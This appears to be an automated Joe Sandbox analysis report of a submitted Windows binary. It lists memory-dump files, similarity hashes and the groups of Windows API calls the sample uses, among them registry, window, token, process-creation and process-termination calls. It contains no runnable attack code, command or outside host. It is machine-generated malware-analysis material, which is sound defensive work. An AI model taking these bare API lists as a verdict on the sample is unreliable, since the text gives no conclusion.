                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID: ou$dou
                                                            • API String ID: 3277943733-952475036
                                                            • Opcode ID: 334c0669c75ccb296aee165a0f028efc9e0b860716d17d451857f8cace628aa7
                                                            • Instruction ID: 9f9469b6af089161bde6d36cc479db894cfa6ae6835ad29070c20fe3f33e8eea
                                                            • Opcode Fuzzy Hash: 334c0669c75ccb296aee165a0f028efc9e0b860716d17d451857f8cace628aa7
                                                            • Instruction Fuzzy Hash: 23F05EF29403007AE7102765BC06FFB7A9DEB08396F408430FA09E61E2D7BA4C0087AC
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006B3F85), ref: 006B4085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 006B408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 006B4097
                                                            • DecodePointer.KERNEL32(006B3F85), ref: 006B40B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 4bee32a39ab7a350848afb590f746924b023a09f0019f372c9e6b3b22bc479b0
                                                            • Instruction ID: 9bf69dc713207ee11cd43fbbc52150892a99ff9f30ac7363417a493f985e59c5
                                                            • Opcode Fuzzy Hash: 4bee32a39ab7a350848afb590f746924b023a09f0019f372c9e6b3b22bc479b0
                                                            • Instruction Fuzzy Hash: 23E092B0681B04ABEA10AF75EC09BC53AA5BB14783F10C228F511E11F1CBBE8640AB18
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 34dc75f1d360b63ce599dc2d496eca258b29278931950623ef800f25f87fbebb
                                                            • Instruction ID: 96c956e523bdfc3707cb177b1b50145abf506c5583d1dc050451e94e4311f116
                                                            • Opcode Fuzzy Hash: 34dc75f1d360b63ce599dc2d496eca258b29278931950623ef800f25f87fbebb
                                                            • Instruction Fuzzy Hash: D1619D7050025A9BDF41EF64CC82AFE3BAAAF05308F04451DFA556B292DB35ED06CB69
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 00710E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007102BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007102FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00710320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00710349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0071038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00710399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 977925befea7faccba588a5ac8feb172fdfba556a1fd23209c58561a551a106b
                                                            • Instruction ID: 5a2b9e9994191eed63e50c19037b257a7b4c091b01f41c0c94680b5c55bd6e90
                                                            • Opcode Fuzzy Hash: 977925befea7faccba588a5ac8feb172fdfba556a1fd23209c58561a551a106b
                                                            • Instruction Fuzzy Hash: 37516A312082009FDB04EF68C885EAFBBE9FF89314F04491DF455872A2DB75E985CB96
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 007157FB
                                                            • GetMenuItemCount.USER32(00000000), ref: 00715832
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0071585A
                                                            • GetMenuItemID.USER32(?,?), ref: 007158C9
                                                            • GetSubMenu.USER32(?,?), ref: 007158D7
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00715928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: dfecc02fc27def2c765edbc6988057ddd2ce5f0b2bc3ebe22c1b34082353bd68
                                                            • Instruction ID: 1b79c111684a83f9116124dbce9600e34c1b8ec0036cd22e46fde364231b163c
                                                            • Opcode Fuzzy Hash: dfecc02fc27def2c765edbc6988057ddd2ce5f0b2bc3ebe22c1b34082353bd68
                                                            • Instruction Fuzzy Hash: 04515F71E00615EFCF15DF68C845AEEB7B5EF48320F104059E801BB391DB74AE818B94
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 006EEF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 006EEF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 006EEFD3
                                                            • _memmove.LIBCMT ref: 006EEFFD
                                                            • VariantClear.OLEAUT32(?), ref: 006EF04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006EF078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: b5b86fa17d7846859e16d91290fe2ef05b137d6e9c6f991a95cf9bfb15c2db5f
                                                            • Instruction ID: 50da531750bb274cef90c465855bd565ee387c3fed8b2f2f65bde68d68ab1d6d
                                                            • Opcode Fuzzy Hash: b5b86fa17d7846859e16d91290fe2ef05b137d6e9c6f991a95cf9bfb15c2db5f
                                                            • Instruction Fuzzy Hash: 5D5178B5A00249EFCB10CF58C890AAAB7B9FF4C310B15856AED49DB341E335E911CFA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 006F2258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F22A3
                                                            • IsMenu.USER32(00000000), ref: 006F22C3
                                                            • CreatePopupMenu.USER32 ref: 006F22F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 006F2355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006F2386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
                                                            • Instruction ID: b7b83d3fdc385b29bf210fb0f4e2d64b4a21d27ae5acfab4cffe7c71dc8ed411
                                                            • Opcode Fuzzy Hash: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
                                                            • Instruction Fuzzy Hash: D0518BB160420EDBDF21CF68C8A8BFDBBE6AF45314F108129EA159B290D7789A45CF51
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0069179A
                                                            • GetWindowRect.USER32(?,?), ref: 006917FE
                                                            • ScreenToClient.USER32(?,?), ref: 0069181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069182C
                                                            • EndPaint.USER32(?,?), ref: 00691876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 677c69cb454ca61a904303457b51ce41653a0801621a0e120beadce69b46a1bd
                                                            • Instruction ID: 8a18d0b2960ce274e300d4adba362c6ae536baa9bb54072eed179658a5e831a4
                                                            • Opcode Fuzzy Hash: 677c69cb454ca61a904303457b51ce41653a0801621a0e120beadce69b46a1bd
                                                            • Instruction Fuzzy Hash: DE419030100701AFDB10DF24CC84FB67BE9EB56724F148668F5A58B2A1C774A845DB65
                                                            APIs
                                                            • ShowWindow.USER32(007557B0,00000000,00D26AD0,?,?,007557B0,?,0071B5A8,?,?), ref: 0071B712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0071B736
                                                            • ShowWindow.USER32(007557B0,00000000,00D26AD0,?,?,007557B0,?,0071B5A8,?,?), ref: 0071B796
                                                            • ShowWindow.USER32(00000000,00000004,?,0071B5A8,?,?), ref: 0071B7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0071B7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0071B7EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
                                                            • Instruction ID: 89638a8b0fabc1d7aa2c163c64b299bfd2c12b9f368aa67ba8840eaa113746d0
                                                            • Opcode Fuzzy Hash: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
                                                            • Instruction Fuzzy Hash: 87414C34604240AFDB26CF28C499BD47BE1FB45310F5881AAE9488F6E2C739A896CB51
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00704E41,?,?,00000000,00000001), ref: 007070AC
                                                              • Part of subcall function 007039A0: GetWindowRect.USER32(?,?), ref: 007039B3
                                                            • GetDesktopWindow.USER32 ref: 007070D6
                                                            • GetWindowRect.USER32(00000000), ref: 007070DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0070710F
                                                              • Part of subcall function 006F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC
                                                            • GetCursorPos.USER32(?), ref: 0070713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00707199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: ea387c2b92d303a2ef120c0fed89e2a67e0ec3939c0964ea725a27719fe31e28
                                                            • Instruction ID: 77f64105e715cd125cbb72c73fafc1e1035d514b354ac33f0c178d62d2497b18
                                                            • Opcode Fuzzy Hash: ea387c2b92d303a2ef120c0fed89e2a67e0ec3939c0964ea725a27719fe31e28
                                                            • Instruction Fuzzy Hash: 0C31F272508309EBC724DF14C849B9BB7EAFFC8304F004A19F595971D1CA38EA19CB96
                                                            APIs
                                                              • Part of subcall function 006E80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E80C0
                                                              • Part of subcall function 006E80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E80CA
                                                              • Part of subcall function 006E80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E80D9
                                                              • Part of subcall function 006E80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E80E0
                                                              • Part of subcall function 006E80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E80F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,006E842F), ref: 006E88CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006E88D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 006E88DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 006E88F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,006E842F), ref: 006E890A
                                                            • HeapFree.KERNEL32(00000000), ref: 006E8911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: db0527703e71859d9e40a455707a8388702e06bff3afaf941e310680ac8cb814
                                                            • Instruction ID: b8feae2b25d9a3c2287c88c390bfdd067bd8cd86f4222d44e5baad12db951d9c
                                                            • Opcode Fuzzy Hash: db0527703e71859d9e40a455707a8388702e06bff3afaf941e310680ac8cb814
                                                            • Instruction Fuzzy Hash: 3E11B131902309FFDB109FA9DC09BFE77AAEB44311F10C168E84997251DB369D04DB60
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006E85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 006E85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006E85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 006E8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 006E8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
                                                            • Instruction ID: 5b2ae842588e41dbaa8cfcbe6f61b215d1639bc68c67d688af8f099cc722f5c2
                                                            • Opcode Fuzzy Hash: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
                                                            • Instruction Fuzzy Hash: 5E115C72501249AFDF01CFA9DD49BDE7BB9EF48304F048064FE08A21A0C7758E61DB60
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 006EB7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 006EB7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006EB7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 006EB7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 006EB7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 006EB7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 740a3637af31a61fa173468f3976b25275bf775670c06b4f034f2d8d61595836
                                                            • Instruction ID: c9d3fd6843c902f69fd94e7b49e13d5a7e0302c59274958023793f7e48e01ed2
                                                            • Opcode Fuzzy Hash: 740a3637af31a61fa173468f3976b25275bf775670c06b4f034f2d8d61595836
                                                            • Instruction Fuzzy Hash: 30018475E00309BBEF109BA69C45A9EBFB8EB48311F008076FA04A7291D6309C00CF95
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B0193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 006B019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B01A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B01B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 006B01B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 006B01C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
                                                            • Instruction ID: 75088a9c96e027d7591fd6da29afa6d99cfb27887eb8c3f74ddd1fa4b82ae84c
                                                            • Opcode Fuzzy Hash: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
                                                            • Instruction Fuzzy Hash: 8E016CB0901B59BDE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A864CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006F53F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006F540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 006F541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F5437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
                                                            • Instruction ID: 563115b353ea61201c852182003276db20f7b235442bdffc13023d6577894229
                                                            • Opcode Fuzzy Hash: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
                                                            • Instruction Fuzzy Hash: 6CF09032240558BBE3215BA6DC0DEEF7F7CEFC6B11F008169FA04D10A1D7A81A0186B9
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 006F7243
                                                            • EnterCriticalSection.KERNEL32(?,?,006A0EE4,?,?), ref: 006F7254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,006A0EE4,?,?), ref: 006F7261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,006A0EE4,?,?), ref: 006F726E
                                                              • Part of subcall function 006F6C35: CloseHandle.KERNEL32(00000000,?,006F727B,?,006A0EE4,?,?), ref: 006F6C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F7281
                                                            • LeaveCriticalSection.KERNEL32(?,?,006A0EE4,?,?), ref: 006F7288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
